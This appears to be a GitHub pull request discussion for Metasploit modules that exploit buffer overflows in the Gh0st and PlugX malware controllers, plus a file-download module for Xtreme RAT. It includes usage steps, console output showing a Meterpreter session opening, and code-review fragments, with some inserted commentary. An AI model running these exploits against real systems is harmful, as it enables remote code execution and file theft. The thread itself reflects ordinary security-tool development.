Gh0st, plugx, Controller Buffer Overflow Modules #8788
This module exploits a buffer overflow in the Gh0st Controller when handling a drive list as received by a victim. This vulnerability can allow remote code execution.

## Verification

Run the Gh0st C2 server on a target Windows machine. The sample 0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c is a Gh0st 3.6 server that works well for testing.

- [ ] use exploit/windows/misc/gh0st
- [ ] set RHOST [ip of target]
- [ ] exploit

Sample output:

```
msf > use exploit/windows/misc/gh0st
msf exploit(gh0st) > set rhost 192.168.161.128
rhost => 192.168.161.128
msf exploit(gh0st) > exploit
[*] Started reverse TCP handler on 192.168.161.1:4444
[*] 192.168.161.128:80 - Trying target Gh0st Beta 3.6
[*] 192.168.161.128:80 - Spraying heap...
[*] 192.168.161.128:80 - Trying command 103...
[*] Sending stage (957487 bytes) to 192.168.161.128
[*] Meterpreter session 1 opened (192.168.161.1:4444 -> 192.168.161.128:49161) at 2017-07-29 10:11:4
```

This module exploits a stack overflow in the Plug-X Controller when handling a larger than expected message. This vulnerability can allow remote code execution; however, it causes a popup message to be displayed on the target before execution is gained.

## Verification

Run the PlugX C2 server on a target Windows machine. The sample 9f59a606c57217d98a5eea6846c8113aca07b203e0dcf17877b34a8b2308ade6 is a PlugX Type 1 server that works well for testing.

- [ ] use exploit/windows/misc/plugx
- [ ] set RHOST [ip of target]
- [ ] set target 1
- [ ] exploit
- [ ] acknowledge the "PeDecodePacket" message on the target

Sample output:

```
msf> use exploit/windows/misc/plugx
msf exploit(plugx) > set rhost 192.168.161.128
rhost => 192.168.161.128
msf exploit(plugx) > set target 1
target => 1
msf exploit(plugx) > check
[*] 192.168.161.128:13579 - "\x03\xB0\x02\x00\x04\x00"
[*] 192.168.161.128:13579 The target appears to be vulnerable.
msf exploit(plugx) >
```

This module is an Xtreme Rat Server Remote File Download Exploit that allows for blind file retrieval from the target.

## Verification

Run the Xtreme Rat server on a target Windows machine.

- [ ] use exploit/windows/misc/xtreme
- [ ] set RHOST [ip of target]
- [ ] set TARGETFILE testfile.txt
- [ ] exploit

Sample output:

```
msf> use exploit/windows/misc/xtreme
msf exploit(plugx) > set rhost 192.168.161.128
rhost => 192.168.161.128
msf exploit(plugx) > set target 1
TARGETFILE => testfile.txt
[*] 192.168.161.128:80 - Trying target Xtreme RAT 3.7...
```
xtreme.rb (outdated)

```
print_status("Trying target #{target.name}...")

connect
sock.put("myversion|{target['Ver']}\r\n")
```
Is this meant to be `#{target['Ver']}` rather than `{target['Ver']}`, like line 56?
Yes, I'm actually surprised it works without this. Updated
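The point of the exchange above, as an added stand-alone Ruby example (this is not code from the PR or from the Metasploit modules): Ruby only interpolates inside `#{...}`, so a bare `{...}` in a double-quoted string is sent to the C2 verbatim and the version string never reaches the wire. The `SAMPLE_TARGET` hash is a constructed stand-in for the module's target entry, and `unescaped_brace_refs` is a heuristic lint I added for catching the same slip during review; neither exists in the framework.

```ruby
# Added example (not code from the PR): shows what the buggy and corrected
# handshake lines actually put on the wire, and a small lint that flags the
# "{...} without #" pattern when reviewing module source.
#
# SAMPLE_TARGET is a constructed stand-in for a Metasploit module target entry.
SAMPLE_TARGET = { 'Ver' => '3.7' }.freeze

# The handshake line as originally submitted: {...} without a leading '#'
# is plain text, so the controller receives "{target['Ver']}" literally.
def buggy_version_line(target)
  "myversion|{target['Ver']}\r\n"
end

# The corrected line: #{...} interpolates the version from the target hash.
def fixed_version_line(target)
  "myversion|#{target['Ver']}\r\n"
end

# Exact bytes a line would put on the socket, rendered the way Ruby's
# String#inspect shows binary data (the same rendering seen in msfconsole output).
def wire_bytes(line)
  line.b.inspect
end

# Heuristic review lint: returns every "{name}" / "{name[...]}" fragment in a
# line of source that is NOT preceded by '#', i.e. a likely missing
# interpolation. It does not parse Ruby; treat hits as something to eyeball.
def unescaped_brace_refs(source_line)
  source_line.scan(/(?<!#)\{\s*\w+(?:\[[^\]]*\])?\s*\}/)
end

if __FILE__ == $0
  puts "buggy: #{wire_bytes(buggy_version_line(SAMPLE_TARGET))}"
  puts "fixed: #{wire_bytes(fixed_version_line(SAMPLE_TARGET))}"
  [
    %q{sock.put("myversion|{target['Ver']}\r\n")},
    %q{sock.put("myversion|#{target['Ver']}\r\n")},
  ].each do |src|
    refs = unescaped_brace_refs(src)
    puts(refs.empty? ? "ok:   #{src}" : "FLAG: #{src} -> #{refs.inspect}")
  end
end
```

Running the file prints the two wire strings side by side and flags only the first `sock.put` line. The reason the module "worked" despite the typo is visible in the output: the controller still received a line of the right shape, just with a bogus version field.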
xtreme.rb (outdated)

```
register_options(
  [
    Opt::RPORT(80),
    OptString.new('TARGETFILE', [false, 'Target file to download', 'user.info'])
```
`TARGETFILE` should probably be `true` rather than `false`, as a target file is required.
xtreme.rb (outdated)

```
  [
    Opt::RPORT(80),
    OptString.new('TARGETFILE', [false, 'Target file to download', 'user.info'])
  ], self.class
```
`self.class` isn't required.
```
register_options(
  [
    Opt::RPORT(13579)
  ], self.class
```
`self.class` isn't required.
```
  [
    OptString.new('MAGIC', [true, 'the 5 char magic used by the server', 'Gh0st']),
    Opt::RPORT(80)
  ], self.class
```
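Review bot: the MAGIC option is described as "the 5 char magic used by the server" but nothing in this hunk constrains its length. If the controller's packet header expects exactly five bytes of magic, a shorter or longer user-supplied value shifts every field that follows it and the module will fail with no useful message. Validate the length up front, for example `fail_with(Failure::BadConfig, 'MAGIC must be exactly 5 characters') unless datastore['MAGIC'].length == 5` at the top of `check`/`exploit`, or state the constraint in the option description so an operator knows why a custom magic is rejected.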
`self.class` isn't required.
xtreme.rb (outdated)

```
end
print_status("Received file #{datastore['TARGETFILE']}!")
# print_status(fdata.inspect)
store_loot('xtremeRat.file', 'text/plain', datastore['RHOST'], fdata, datastore['TARGETFILE'], 'File retrieved from Xtreme C2 server')
```
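Review bot: the commented-out `# print_status(fdata.inspect)` on the third line of this hunk is leftover debugging and should be removed before landing, or turned into `vprint_status(fdata.inspect)` if seeing the raw bytes is genuinely useful under VERBOSE. On the `store_loot` line, the content type is hard-coded to `'text/plain'` although TARGETFILE can name any file on the controller; unless the module only ever retrieves text, `'application/octet-stream'` is the honest default. Consider also using the `rhost` accessor rather than `datastore['RHOST']` for the host argument, which is the convention in the other Tcp-mixin modules.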
It might be nice to notify the user where the file was saved. `store_loot` returns the file path, so you can do something like:

```
path = store_loot(...)
print_good("File saved in: #{path}")
```
fixed typo in xtreme.rb when communicating with C&C
removed self.class from options on all three modules
added line to log path where loot has been stored in xtreme.rb
I've made the suggested improvements in my fork, thank you.
removed duplicate file from wrong location
Do you have access to samples for all 3 of these?

Yes, I do. Please see attached

@bcoles do you wanna take this one? My schedule has freed up some, so I wouldn't mind doing these.

All yours @h00die

@Professor-plum what is the password for Xtreme Rat zip? I tried 'infected' as is the industry standard, but no luck.

@Professor-plum I'll also note that typically you want to submit 1 module per pull request. So in this case you'd want to submit 3. It makes things go quicker and easier, so if 1 module had an issue, the others could land while we fix up the other. In this case though, since @bcoles already gave everything a once over, we'll just keep going.
gh0st working for me against xp sp3:
I'm getting no luck on PlugX Type II. It shows "waiting for response", and the target pops up a box that says "OnSocketPacket". No shell. Then I get an access violation crash. Unfortunately, since all 3 exploits are shoved in one PR, you didn't show an example run of this, and there are no docs included, so I'm not sure if it's operator error on my part or not. Please advise.

Cleaned up the title and description of your request. You should also add docs to the pull request. There are many examples, but see https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/http/diskboss_get_bof.md . There is a template here: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md
@Professor-plum waiting on the following:
Just want to check in to make sure you are still around and not ditching this |
Sorry, I meant to get to this today but time escaped me. I'm not sure what is wrong with the zip, infected should be the password. I'm attaching another copy, this time no password. The plugX sample isn't for the default target type so you'll need to

I tried documenting each module on the commit comments for each, per the format requested. I'm attaching that documentation below for convenience.

## PlugX

This module exploits a stack overflow in the Plug-X Controller when handling a larger than expected message. This vulnerability can allow remote code execution; however, it causes a popup message to be displayed on the target before execution is gained.

### Verification

Run the PlugX C2 server on a target Windows machine. The sample 9f59a606c57217d98a5eea6846c8113aca07b203e0dcf17877b34a8b2308ade6 is a PlugX Type 1 server that works well for testing.

Sample output:

## Xtreme RAT

This module is an Xtreme Rat Server Remote File Download Exploit that allows for blind file retrieval from the target.

### Verification

Run the Xtreme Rat server on a target Windows machine.

Sample output:
plugx working. I swear I tried changing the target, but who knows.
No go on Xtreme RAT (but it unzipped and ran).

The other issue is it's a file downloader; if it doesn't give a shell it needs to be moved to the auxiliary folders.

For future reference, you'll also want to use a different branch than master for your own fork.

xtreme is going to need a slight re-write to be in aux.
Modules cleanup and add docs
## Release Notes

The Gh0st Client buffer Overflow module has been added to the framework. It targets the malware Gh0st controller, as well as the PlugX controller, to result in remote code execution.

@Professor-plum congrats on landing your first 2 modules to the framework! Thank you for your contributions. Hopefully we'll see a new PR for the aux module with xtreme. If you have questions, you can always jump on IRC to ask for help!
This PR contains 2 exploits for different malware controllers.

This module exploits a buffer overflow in the Gh0st Controller when handling a drive list as received by a victim. This vulnerability can allow remote code execution.

## Verification

Sample output for gh0st:

## Historical Notes

This also originally included xtreme rat, which was removed for a rewrite into a diff PR.